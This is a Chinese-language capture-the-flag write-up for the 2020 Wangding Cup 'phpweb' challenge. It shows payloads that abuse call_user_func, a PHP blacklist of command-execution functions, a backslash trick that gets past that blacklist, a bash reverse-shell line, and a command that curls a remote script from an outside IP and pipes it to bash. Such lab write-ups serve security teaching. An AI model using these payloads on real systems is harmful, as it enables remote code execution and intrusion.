[网鼎杯 2020 朱雀组]phpweb-反弹shell

[网鼎杯 2020 朱雀组]phpweb

通过反弹shell获取flag

打开链接，显示一个不断刷新的页面，通过burp抓包查看

通过对页面源代码的分析，发现在本页面中，通过post传入index.php中两个参数，通过对参数的修改，发现用到了call_user_func()函数

故猜测本题通过func传入php函数名，通过p参数传入函数值，尝试读取index.php文件内容

利用

func=file_get_contents&p=index.php
func=readfile&p=index.php

读取到index.php文件内容，对代码进行分析

    $disable_fun = array("exec","shell_exec","system",
	"passthru","proc_open","show_source","phpinfo",
	"popen","dl","eval","proc_terminate","touch",
	"escapeshellcmd","escapeshellarg","assert",
	"substr_replace","call_user_func_array",
	"call_user_func","array_filter",
	"array_walk",  "array_map","registregister_shutdown_function",
	"register_tick_function","filter_var", "filter_var_array", 
	"uasort", "uksort", "array_reduce","array_walk", 
	"array_walk_recursive","pcntl_exec","fopen","fwrite",
	"file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);//将传入的两个参数，赋给call_user_func函数，作为参数执行
        $a= gettype($result);//判断返回类型，若为字符串就输出对应的结果
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {//构造反序列化时，可以利用这个类
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);//func值不为空，即调用gettime函数
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];	//接收get或post传入的值

    if ($func != null) {	//判断非空
        $func = strtolower($func);	//转换成小写
        if (!in_array($func,$disable_fun)) {	//过滤掉被禁用的函数之后执行函数gettime
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }

可以通过反序列化搭配命令执行求解，也可以只通过命令执行求解，但是重点介绍本题通过反弹shell的做法

在攻击机中，新建一个能反弹shell的命令文件（1.txt），里面写入命令：bash -i >& /dev/tcp/ip/port 0>&1,ip是服务器ip，port为2002

本地curl测试：

同理可以构造命令进行反弹shell：

func=\system&p=curl http://101.43.119.212/YKingH/test/1.txt|bash

连接成功